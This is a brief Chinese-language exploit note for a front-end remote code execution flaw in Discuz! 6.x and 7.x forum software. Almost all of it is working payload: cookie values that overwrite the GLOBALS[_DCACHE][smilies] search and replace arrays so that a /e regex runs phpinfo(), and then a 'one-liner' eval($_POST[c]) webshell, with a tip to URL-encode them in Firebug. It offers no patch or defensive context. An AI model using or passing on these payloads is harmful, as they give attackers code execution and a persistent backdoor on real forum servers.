Discuz! 6.x 7.x 前台代码执行漏洞

影响版本

Discuz! 6.x 7.x

利用方法

添加以下cookie信息即可,刷新帖子页面

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui;
GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

通过firebug修改勾选url编码内容

一句话

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui;
GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B;